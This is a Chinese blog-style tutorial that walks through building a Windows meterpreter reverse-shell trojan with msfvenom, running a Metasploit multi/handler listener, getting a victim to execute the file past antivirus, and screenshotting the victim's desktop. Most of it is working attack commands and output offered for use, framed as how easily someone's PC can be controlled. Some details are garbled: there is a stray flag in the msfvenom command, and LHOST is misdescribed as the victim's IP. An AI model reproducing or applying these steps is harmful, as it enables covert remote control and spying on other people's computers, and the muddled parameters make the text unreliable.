最近某安全厂商很火,很多离职员工都是被这套系统抓出来的。其实原理很简单,本文就用很多人都用过的kali系统,告诉你,想要控制你的电脑有多简单!

网上的文章很多,如这篇,Kali攻防,写的不错,但是其中的步骤个人感觉还是有些乱,而且kali的版本也不同,所以还是自己整理一下。文中会涉及一些基本概念,请大家自己脑补。

1、生成木马

以前看其他文章没有写仔细,先启动了msfconsole,结果采用如下语句一直无法生成木马,后来发现是步骤错了,不能先启动msfconsole,直接在kali的命令行里输入以下语句即可:

root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_tcp -e LHOST=10.0.2.15 LPORT=4444 -f exe > testhack.exe

成功执行后,会在root文件夹下生成一个exe文件,留好了备用。记者这里的LHOST是用本地IP。

需要提醒的是:

很多文章中payload都用的是windows/x64/meterpreter/reverse_tcp,但我的kali版本中是windows/x64/meterpreter_reverse_tcp,这一点请注意,可以用show payloads看看你的系统是不是跟我一样?

2、执行msfconsole

上面讲了,第二步才是执行msfconsole,执行完毕以后,每次都会有不同动物的图案出现,很好玩!

监控windows进程状态 zabbix 监控电脑状态_Kali

 

3、使用handler模块

需要说明的是,我这里是msf5提示符,不是其他文章中介绍的msf

msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) >

4、查看handler参数(可选)

msf5 exploit(multi/handler) > show options

监控windows进程状态 zabbix 监控电脑状态_Kali_02

出现上述截图,说明是成功的

5、shellcode设置

msf5 exploit(multi/handler) >  set payload windows/x64/meterpreter_reverse_tcp

payload => windows/x64/meterpreter_reverse_tcp

msf5 exploit(multi/handler) > show options

6、修改LHOST和LPORT端口

在执行以下配置之前,首先保证受攻击方的电脑是正常开启的,否则后面的步骤不会成功。最好是把后面第7步的上传并在受攻击机器上执行exe文件也执行了,保证后面一步成功!

msf5 exploit(multi/handler) > set LHOST 10.0.2.18
LHOST => 10.0.2.18
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > show options

监控windows进程状态 zabbix 监控电脑状态_安全_03

与第4步的图是不同的,说明配置参数成功。这里的LHOST就是被攻击端的IP,不要搞错了。

7、执行exploit命令

msf5 exploit(multi/handler) > exploit

监控windows进程状态 zabbix 监控电脑状态_web安全_04

到这一步,就剩下让刚才制定的10.0.2.18去执行第一步生成的exe文件了,由于这个文件肯定会被杀毒软件封杀,所以上传到10.0.2.18的时候,需要各显神通了。出现上述截图,说明攻击成功了!

8、验证

metepreter > screenshot

监控windows进程状态 zabbix 监控电脑状态_Kali_05

那么就会把 10.0.2.18的桌面截图存放在攻击电脑上,市面上那些可以监控你屏幕的软件,基本都是基于这套东西做出来的。